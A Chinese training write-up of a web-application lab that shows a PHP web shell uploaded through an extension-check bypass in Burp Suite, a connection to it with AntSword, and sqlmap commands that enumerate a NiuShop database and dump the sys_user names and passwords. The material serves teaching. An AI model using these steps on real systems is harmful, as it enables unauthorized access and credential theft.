网络安全实训第三天

1 文件上传漏洞

  • 准备一句话文件wjr.php.png,进入到更换头像的界面,使用BP拦截选择文件的请求

在这里插入图片描述

  • 拦截到请求后将wjr.phh.png修改为wjr.php,进行转发

在这里插入图片描述

  • 由上图可以查看到上传目录为网站目录下的upload/avator,查看是否上传成功

在这里插入图片描述


  • 使用时间戳在线工具获取到上传文件的名称

在这里插入图片描述

  • 打开中国蚁剑,将上传文件对应的URL输入,并在连接密码处输入cmd,点击添加

在这里插入图片描述


  • 双击进入后可以查看网站目录

在这里插入图片描述


2 SQL注入漏洞

2.1 第一个注入点

  • 进入存在注入点的网页

在这里插入图片描述


  • 输入id=1 and 1=2进行测试,如果与之前的显示不一样则存在SQL注入漏洞

在这里插入图片描述


2.2 第二个注入点

  • 进入存在注入点的网页

在这里插入图片描述


  • 使用BP拦截刷新界面的操作,获取到请求流量,并保存到wjr.txt中

在这里插入图片描述


  • 打开SQLmap工具,输入命令搜索是否存在注入点
python sqlmap.py -r “C:\Users\14724\Desktop\wjr.txt” --batch

在这里插入图片描述


  • 输入命令获取所有的数据库
python sqlmap.py -r “C:\Users\14724\Desktop\wjr.txt” --batch --dbs

在这里插入图片描述


  • 输入命令获取指定数据库的所有表
python sqlmap.py -r “C:\Users\14724\Desktop\wjr.txt” --batch -D niushop_b2c2 --tables

在这里插入图片描述


  • 输入命令获取注定数据库中指定表的所有字段
python sqlmap.py -r “C:\Users\14724\Desktop\wjr.txt” --batch -D niushop_b2c2 -T sys_user --columns

在这里插入图片描述


  • 输入命令获取指定数据库中的指定表的指定字段,这里指定的是user_name和user_password,–dump的作用是获取表中的信息
python sqlmap.py -r “C:\Users\14724\Desktop\wjr.txt” --batch -D niushop_b2c2 -T sys_user -C user_name,user_password --dump

在这里插入图片描述


2.3 第三个注入点

  • 第三个注入点在搜索中
    在这里插入图片描述

  • 使用BP截获搜索请求,将请求保存在wjr.txt中,并使用sqlmap进行测试

在这里插入图片描述


  • 获取到数据库信息

在这里插入图片描述


2.4 第四个注入点

  • 进入存在注入点的网页

在这里插入图片描述


  • 使用BP拦截修改操作,并将流量保存到wjr.txt中

在这里插入图片描述


  • 使用SQLmap获取到数据库信息

在这里插入图片描述

  • 14
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值